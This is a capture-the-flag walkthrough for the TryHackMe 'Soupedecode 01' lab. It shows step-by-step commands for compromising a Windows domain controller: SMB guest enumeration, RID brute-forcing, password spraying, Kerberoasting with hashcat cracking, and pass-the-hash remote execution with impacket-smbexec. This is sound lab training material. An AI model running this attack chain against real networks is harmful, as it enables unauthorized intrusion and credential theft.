Soupedecode 01

-- "Test your enumeration skills on this boot-to-root machine."

Pasted image 20250815183215.png

Room Link: https://tryhackme.com/room/soupedecode01

Site Description

Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.

Challenge

Nmap

As a part of initial reconnaissance, let's run nmap scan against the target system to find out all the open ports.

  • -sS: Syn Scan
  • -sC: Default script scan
  • -sV: Check for the service version
sudo nmap -sS -sC -sV -vv -T5 <--IP Address--> -oA Nmap/Soupedecoude.nmap

Pasted image 20250815184503.png

From the scan result we can notice that this target is a windows operating system running as a Domain Controller to some active directory setup.

And some key contents that we can take way from the script scan are the Domain Name and FQDN (Fully Qualified Domain Name)

  • Domain Name: SOUPEDECODE.LOCAL
  • FQDN: DC01.SOUPEDECODE.LOCAL

Now to further enumerate this, let's add the Domain name of the target system in our /etc/hosts file.

sudo nano /etc/hosts

Content:

<--IP Address--> soupedecode.local

Pasted image 20250815185534.png

SMB Enumeration

The port numbers 139 and 445 shows us that there is SMB Share enabled in the target system. Using the nxc tool, we can attempt to login into the Share as a default guest user without passing any password.

nxc smb soupedecode.local -u guest -p ''

Pasted image 20250815191256.png

Since we get a connect to the share as a guest user, we can now use this to leverage into seeing the shares available in the target system.

nxc smb soupedecode.local -u guest -p '' --shares

Pasted image 20250815191444.png

User Enumeration

From the shares command we learn that the IPC$ is readable to use as a guest (which is a special, hidden network share that allows for remote inter-process communication using named pipes, IPC$ is frequently used by tools and services that need to manage or interact with remote systems, such as for listing users, shares, or starting/stopping services. (Read more about it Here)).

Now, let's enumerate the users using RID Brut-Force concept.

nxc smb soupedecode.local -u guest -p '' --rid

Pasted image 20250815192205.png

You can use command line commands or any application and create a list called username.txt from that output.

Pasted image 20250815202157.png

Now, going down the path of ASRPRosting or any other methods did not give a successful result. But one of the other side with these usernames, most vulnerable formats of credentials are the combination of same username:password.

Example: 
	admin:admin
	root:root

So, using the same tool, we can now try with password spraying with the username list itself.

nxc smb soupedecode.local -u username.txt -p username.txt --no-brute --continue-on-success

Pasted image 20250815214241.png

We find the user ybob317's password.

Let's try with using this account to look at the file share.

nxc smb soupedecode.local -u 'ybob317' -p 'ybob317' --shares

Pasted image 20250815214740.png

This means that we have can now access the users folder of the share.

smbclient //soupedecode.local/Users -U ybob317

Pasted image 20250815214928.png

Looking under the Desktop folder of ybob317 we get the user flag.

Pasted image 20250815215234.png

Kerberos Enumeration

Now, let's go with Kerberosting of the SPNs (Service Principle Name) using the impacket modules

impacket-GetUserSPNs soupedecode.local/ybob317:ybob317 -dc-ip 10.201.9.153 -request -output hash.txt

Pasted image 20250816123440.png

With the hash that is generated in the hash.txt file, we can try cracking that with hashcat

hashcat hash.txt <--Location to your rockyou.txt-->

Pasted image 20250816130835.png
Lol, I know there is no point in this image, but still 😂

With this password, we can try loging into the shares

nxc smb soupedecode.local -u 'file_svc' -p '<--Password-->' --shares

Pasted image 20250816133819.png

Here, the backup folder is readable to use. Let's connect to the smb share and look at the contents

smbclient //soupedecode.local/backup -U file_svc

Pasted image 20250816134103.png

We download the backup_extract.txt file, and it contains some NTLM hashes.

Pasted image 20250816134203.png

With these hashes, we can attempt to find the right hash that has access to the execute remote commands over SMB.

Remote code over SMB

First, let use get the usernames from this file

cut -d ":" -f 1 backup_extract.txt > NTLM-Users.txt

Pasted image 20250816134815.png

Similarly, take those hashes

cut -d ":" -f 4 backup_extract.txt > NTLM-Hash.txt

Pasted image 20250816134926.png

Now, let's perform password spare on the smb share

nxc smb soupedecode.local -u NTLM-Users.txt -H NTLM-Hash.txt --no-brute

Pasted image 20250816135545.png

We get a valid NTLM Hash here for the user FileServer. With this, we can get the remote code over SMB using smbexec

impacket-smbexec 'FileServer$'@soupedecode.local -hashes ':<--Hash-->'

Pasted image 20250816140416.png

Here in the Desktop Folder, we can find the root flag

Pasted image 20250816140648.png

Pasted image 20250816140724.png

And there we go! Found the root flag too!!!

Thanks to josemlwdf for this amazing room! 😊

Contents

Check Out the Walkthrough Video

Table Of Contents
Soupedecode 01
Site Description
Challenge
Nmap
SMB Enumeration
User Enumeration
Kerberos Enumeration
Remote code over SMB